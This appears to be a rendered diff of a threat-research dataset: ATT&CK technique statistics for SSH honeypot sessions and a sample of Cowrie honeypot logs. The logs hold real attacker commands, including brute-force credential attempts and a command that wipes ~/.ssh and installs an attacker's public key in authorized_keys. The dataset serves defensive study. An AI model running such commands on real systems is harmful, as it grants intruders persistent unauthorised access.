{"period": "2024", "technique_id": "T1070", "technique": "T1070 Indicator Removal", "tactics": "Defense Evasion", "session_count": 5555, "session_share": 0.834335}
|
| 26 |
+
{"period": "2024", "technique_id": "T1222", "technique": "T1222 File and Directory Permissions Modification", "tactics": "Defense Evasion", "session_count": 5019, "session_share": 0.75383}
|
| 27 |
+
{"period": "2024", "technique_id": "T1098", "technique": "T1098 Account Manipulation", "tactics": "Persistence; Privilege Escalation", "session_count": 4937, "session_share": 0.741514}
|
| 28 |
+
{"period": "2024", "technique_id": "T1059", "technique": "T1059 Command and Scripting Interpreter", "tactics": "Execution", "session_count": 1799, "session_share": 0.270201}
|
| 29 |
+
{"period": "2024", "technique_id": "T1083", "technique": "T1083 File and Directory Discovery", "tactics": "Discovery", "session_count": 1709, "session_share": 0.256684}
|
| 30 |
+
{"period": "2024", "technique_id": "T1082", "technique": "T1082 System Information Discovery", "tactics": "Discovery", "session_count": 1339, "session_share": 0.201111}
|
| 31 |
+
{"period": "2024", "technique_id": "T1087", "technique": "T1087 Account Discovery", "tactics": "Discovery", "session_count": 1328, "session_share": 0.199459}
|
| 32 |
+
{"period": "2024", "technique_id": "T1057", "technique": "T1057 Process Discovery", "tactics": "Unmapped", "session_count": 737, "session_share": 0.110694}
|
| 33 |
+
{"period": "2024", "technique_id": "T1562", "technique": "T1562 Impair Defenses", "tactics": "Defense Evasion", "session_count": 733, "session_share": 0.110093}
|
| 34 |
+
{"period": "2024", "technique_id": "T1053", "technique": "T1053 Scheduled Task/Job", "tactics": "Persistence; Privilege Escalation", "session_count": 731, "session_share": 0.109793}
|
| 35 |
+
{"period": "2024", "technique_id": "T1105", "technique": "T1105 Ingress Tool Transfer", "tactics": "Command and Control", "session_count": 567, "session_share": 0.085161}
|
| 36 |
+
{"period": "2024", "technique_id": "T1036", "technique": "T1036 Masquerading", "tactics": "Defense Evasion", "session_count": 539, "session_share": 0.080955}
|
| 37 |
+
{"period": "2024", "technique_id": "T1016", "technique": "T1016 System Network Configuration Discovery", "tactics": "Discovery", "session_count": 420, "session_share": 0.063082}
|
| 38 |
+
{"period": "2024", "technique_id": "T1424", "technique": "T1424 Process Discovery", "tactics": "Discovery", "session_count": 158, "session_share": 0.023731}
|
| 39 |
+
{"period": "2024", "technique_id": "T1005", "technique": "T1005 Data from Local System", "tactics": "Collection", "session_count": 67, "session_share": 0.010063}
|
| 40 |
+
{"period": "2024", "technique_id": "T1564", "technique": "T1564 Hide Artifacts", "tactics": "Defense Evasion", "session_count": 43, "session_share": 0.006458}
|
| 41 |
+
{"period": "2024", "technique_id": "T1489", "technique": "T1489 Service Stop", "tactics": "Impact", "session_count": 27, "session_share": 0.004055}
|
| 42 |
+
{"period": "2024", "technique_id": "T1027", "technique": "T1027 Obfuscated Files or Information", "tactics": "Defense Evasion", "session_count": 10, "session_share": 0.001502}
|
| 43 |
+
{"period": "2024", "technique_id": "T1548", "technique": "T1548 Abuse Elevation Control Mechanism", "tactics": "Defense Evasion; Privilege Escalation", "session_count": 7, "session_share": 0.001051}
|
| 44 |
+
{"period": "2024", "technique_id": "T1003", "technique": "T1003 OS Credential Dumping", "tactics": "Credential Access", "session_count": 7, "session_share": 0.001051}
|
| 45 |
+
{"period": "2024", "technique_id": "T1069", "technique": "T1069 Permission Groups Discovery", "tactics": "Discovery", "session_count": 7, "session_share": 0.001051}
|
| 46 |
+
{"period": "2024", "technique_id": "T1082:", "technique": "T1082: System Information Discovery", "tactics": "Unmapped", "session_count": 3, "session_share": 0.000451}
|
| 47 |
+
{"period": "2024", "technique_id": "T1590", "technique": "T1590 Gather Victim Network Information", "tactics": "Unmapped", "session_count": 2, "session_share": 0.0003}
|
| 48 |
+
{"period": "2024", "technique_id": "T1071", "technique": "T1071 Application Layer Protocol", "tactics": "Command and Control", "session_count": 2, "session_share": 0.0003}
|
| 49 |
+
{"period": "2024", "technique_id": "T1033", "technique": "T1033 System Owner/User Discovery", "tactics": "Discovery", "session_count": 1, "session_share": 0.00015}
|
attack_ttp/paper_tactics.jsonl
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"tactic": "Discovery", "share_2021_2022": 0.3313, "share_2024": 0.1805, "trend": "down"}
|
| 2 |
+
{"tactic": "Collection", "share_2021_2022": 0.0002, "share_2024": 0.0021, "trend": "up"}
|
| 3 |
+
{"tactic": "Command and Control", "share_2021_2022": 0.016, "share_2024": 0.0179, "trend": "up"}
|
| 4 |
+
{"tactic": "Credential Access", "share_2021_2022": 0.0, "share_2024": 0.0001, "trend": "up"}
|
| 5 |
+
{"tactic": "Defense Evasion", "share_2021_2022": 0.0758, "share_2024": 0.3877, "trend": "up"}
|
| 6 |
+
{"tactic": "Execution", "share_2021_2022": 0.1801, "share_2024": 0.1488, "trend": "down"}
|
| 7 |
+
{"tactic": "Impact", "share_2021_2022": 0.0002, "share_2024": 0.0007, "trend": "up"}
|
| 8 |
+
{"tactic": "Persistence", "share_2021_2022": 0.1975, "share_2024": 0.1311, "trend": "down"}
|
| 9 |
+
{"tactic": "Privilege Escalation", "share_2021_2022": 0.1988, "share_2024": 0.1312, "trend": "down"}
|
attack_ttp/paper_techniques.jsonl
ADDED
|
@@ -0,0 +1,27 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"technique_id": "T1016", "technique": "System Network Configuration Discovery", "share_2021_2022": 0.00085, "share_2024": 0.01751, "trend": "up"}
|
| 2 |
+
{"technique_id": "T1033", "technique": "System Owner/User Discovery", "share_2021_2022": 4e-05, "share_2024": 0.01589, "trend": "up"}
|
| 3 |
+
{"technique_id": "T1069", "technique": "Permission Groups Discovery", "share_2021_2022": 0.0, "share_2024": 0.00016, "trend": "up"}
|
| 4 |
+
{"technique_id": "T1082", "technique": "System Information Discovery", "share_2021_2022": 0.18294, "share_2024": 0.06894, "trend": "down"}
|
| 5 |
+
{"technique_id": "T1083", "technique": "File and Directory Discovery", "share_2021_2022": 0.08058, "share_2024": 0.04499, "trend": "down"}
|
| 6 |
+
{"technique_id": "T1087", "technique": "Account Discovery", "share_2021_2022": 0.11551, "share_2024": 0.04382, "trend": "down"}
|
| 7 |
+
{"technique_id": "T1124", "technique": "System Time Discovery", "share_2021_2022": 4e-05, "share_2024": 2e-05, "trend": "down"}
|
| 8 |
+
{"technique_id": "T1424", "technique": "Process Discovery", "share_2021_2022": 0.05726, "share_2024": 0.01835, "trend": "down"}
|
| 9 |
+
{"technique_id": "T1518", "technique": "Software Discovery", "share_2021_2022": 4e-05, "share_2024": 0.00133, "trend": "up"}
|
| 10 |
+
{"technique_id": "T1614", "technique": "System Location Discovery", "share_2021_2022": 0.0, "share_2024": 6e-05, "trend": "up"}
|
| 11 |
+
{"technique_id": "T1005", "technique": "Data from Local System", "share_2021_2022": 0.00023, "share_2024": 0.0024, "trend": "up"}
|
| 12 |
+
{"technique_id": "T1071", "technique": "Application Layer Protocol", "share_2021_2022": 0.0, "share_2024": 0.00019, "trend": "up"}
|
| 13 |
+
{"technique_id": "T1105", "technique": "Ingress Tool Transfer", "share_2021_2022": 0.02113, "share_2024": 0.0207, "trend": "down"}
|
| 14 |
+
{"technique_id": "T1003", "technique": "OS Credential Dumping", "share_2021_2022": 0.0, "share_2024": 0.00017, "trend": "up"}
|
| 15 |
+
{"technique_id": "T1059", "technique": "Command and Scripting Interpreter", "share_2021_2022": 0.18043, "share_2024": 0.15815, "trend": "down"}
|
| 16 |
+
{"technique_id": "T1053", "technique": "Scheduled Task/Job", "share_2021_2022": 0.05731, "share_2024": 0.01583, "trend": "down"}
|
| 17 |
+
{"technique_id": "T1098", "technique": "Account Manipulation", "share_2021_2022": 0.20268, "share_2024": 0.1374, "trend": "down"}
|
| 18 |
+
{"technique_id": "T1547", "technique": "Boot or Logon Autostart Execution", "share_2021_2022": 0.00069, "share_2024": 5e-05, "trend": "down"}
|
| 19 |
+
{"technique_id": "T1548", "technique": "Abuse Elevation Control Mechanism", "share_2021_2022": 0.00173, "share_2024": 0.00019, "trend": "down"}
|
| 20 |
+
{"technique_id": "T1027", "technique": "Obfuscated Files or Information", "share_2021_2022": 0.00499, "share_2024": 0.01582, "trend": "up"}
|
| 21 |
+
{"technique_id": "T1070", "technique": "Indicator Removal", "share_2021_2022": 0.01834, "share_2024": 0.17176, "trend": "up"}
|
| 22 |
+
{"technique_id": "T1222", "technique": "File and Directory Permissions Modification", "share_2021_2022": 0.0584, "share_2024": 0.22948, "trend": "up"}
|
| 23 |
+
{"technique_id": "T1562", "technique": "Impair Defenses", "share_2021_2022": 0.0, "share_2024": 0.01585, "trend": "up"}
|
| 24 |
+
{"technique_id": "T1564", "technique": "Hide Artifacts", "share_2021_2022": 5e-05, "share_2024": 0.00146, "trend": "up"}
|
| 25 |
+
{"technique_id": "T1655", "technique": "Masquerading", "share_2021_2022": 0.0165, "share_2024": 0.01874, "trend": "up"}
|
| 26 |
+
{"technique_id": "T1489", "technique": "Service Stop", "share_2021_2022": 0.00021, "share_2024": 0.00073, "trend": "up"}
|
| 27 |
+
{"technique_id": "T1496", "technique": "Resource Hijacking", "share_2021_2022": 5e-05, "share_2024": 4e-05, "trend": "down"}
|
commands/2021_2022.jsonl
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
commands/2024.jsonl
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
raw_samples/cowrie_ssh_2024_sample.jsonl
ADDED
|
@@ -0,0 +1,300 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "39646", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.933043"}
|
| 2 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "39646", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.935366"}
|
| 3 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:58024 (64.31.55.123:22) [session: 7ca8c1805a97]", "src_host": "43.156.90.187", "src_port": "58024", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.937237"}
|
| 4 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:58724 (64.31.55.123:22) [session: 5af001bd1a33]", "src_host": "209.38.229.174", "src_port": "58724", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.938192"}
|
| 5 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:56078 (64.31.55.123:22) [session: ed8a043a1aa9]", "src_host": "43.156.90.187", "src_port": "56078", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.939067"}
|
| 6 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:49566 (64.31.55.123:22) [session: ac958a5d50ca]", "src_host": "209.38.229.174", "src_port": "49566", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.939920"}
|
| 7 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "58024", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.943949"}
|
| 8 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "58724", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.944591"}
|
| 9 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "56078", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.945196"}
|
| 10 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "49566", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:04.945796"}
|
| 11 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "35.237.74.174", "src_port": "36948", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:07.548876"}
|
| 12 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:60014 (64.31.55.123:22) [session: 7e7d17861773]", "src_host": "43.156.90.187", "src_port": "60014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:18.559805"}
|
| 13 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "60014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:18.736975"}
|
| 14 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'pixmaps'/b'123456'] succeeded", "src_host": "43.156.90.187", "src_port": "60014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:19.539459"}
|
| 15 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "43.156.90.187", "src_port": 60014, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:20.729135"}
|
| 16 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "43.156.90.187", "src_port": 60014, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:35.012877"}
|
| 17 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:40412 (64.31.55.123:22) [session: ac4455cb0112]", "src_host": "209.38.229.174", "src_port": "40412", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:35.016564"}
|
| 18 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "40412", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:35.161026"}
|
| 19 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~", "src_host": "43.156.90.187", "src_port": 60014, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:36.060238"}
|
| 20 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: root@ubuntu:~#", "src_host": "43.156.90.187", "src_port": 60014, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:36.061086"}
|
| 21 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'dot'/b'123456'] succeeded", "src_host": "209.38.229.174", "src_port": "60014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:36.214375"}
|
| 22 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:37068 (64.31.55.123:22) [session: ad2f9b4b7141]", "src_host": "43.156.90.187", "src_port": "37068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:36.415204"}
|
| 23 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cd ~; chattr -ia .ssh; lockr -ia .ssh", "src_host": "209.38.229.174", "src_port": 40412, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:37.291683"}
|
| 24 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: chattr: command not found\nlockr: command not found\nroot@ubuntu:~# ", "src_host": "209.38.229.174", "src_port": 40412, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.787234"}
|
| 25 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "43.156.90.187", "src_port": "37068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.790836"}
|
| 26 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 43.156.90.187:37076 (64.31.55.123:22) [session: d6f20740d738]", "src_host": "43.156.90.187", "src_port": "37076", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.797660"}
|
| 27 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "37068", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.798757"}
|
| 28 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:50450 (64.31.55.123:22) [session: 84715375542a]", "src_host": "209.38.229.174", "src_port": "50450", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.799633"}
|
| 29 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "37076", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.800969"}
|
| 30 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "50450", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:57.949418"}
|
| 31 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "43.156.90.187", "src_port": 60014, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:58.767893"}
|
| 32 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "43.156.90.187", "src_port": 60014, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:58.768373"}
|
| 33 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "43.156.90.187", "src_port": "60014", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:58.946124"}
|
| 34 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'345gs5662d34'/b'345gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "40412", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:00:59.225011"}
|
| 35 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "50450", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:00.375063"}
|
| 36 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "50450", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:00.375900"}
|
| 37 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:53442 (64.31.55.123:22) [session: 0d933e8ef2df]", "src_host": "209.38.229.174", "src_port": "53442", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:00.523148"}
|
| 38 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "53442", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:00.672420"}
|
| 39 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'dot'/b'3245gs5662d34'] failed", "src_host": "209.38.229.174", "src_port": "40412", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:01.364343"}
|
| 40 |
+
{"info": "session.loseConnection", "alert": "Initial Access", "tshark": "[SERVER] - Disconnecting with error, code11 reason: b'Bye Bye'", "src_host": "209.38.229.174", "src_port": "53442", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:02.514933"}
|
| 41 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "53442", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:02.516164"}
|
| 42 |
+
{"info": "command.input", "alert": "Execution", "tshark": "INPUT_COMD: cat /proc/cpuinfo | grep name | wc -l", "src_host": "209.38.229.174", "src_port": 40412, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:03.535271"}
|
| 43 |
+
{"info": "command.input", "alert": "Execution", "tshark": "OUTPUT: ERRORnot enough values to unpack (expected 3, got 1)", "src_host": "209.38.229.174", "src_port": 40412, "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:03.535679"}
|
| 44 |
+
{"info": "session.closed", "alert": "Initial Access", "tshark": "Timeout reached in HoneyPotSSHTransport", "src_host": "209.38.229.174", "src_port": "40412", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:03.681165"}
|
| 45 |
+
{"info": "session.connect", "alert": "Initial Access", "tshark": "New connection: 209.38.229.174:59494 (64.31.55.123:22) [session: 1bca2824589e]", "src_host": "209.38.229.174", "src_port": "59494", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:24.471187"}
|
| 46 |
+
{"info": "session.kex", "alert": "Initial Access", "tshark": "SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a", "src_host": "209.38.229.174", "src_port": "59494", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:24.616525"}
|
| 47 |
+
{"info": "userlogin", "alert": "Credential Access", "tshark": "login attempt [b'www'/b'nobody'] failed", "src_host": "209.38.229.174", "src_port": "59494", "dst_host": "64.31.55.123", "dst_port": "22", "protocol": "ssh", "pot_id": "ssh", "request": "", "timestamp": "2024-01-23 00:01:25.284030"}
|
| 48 |
+
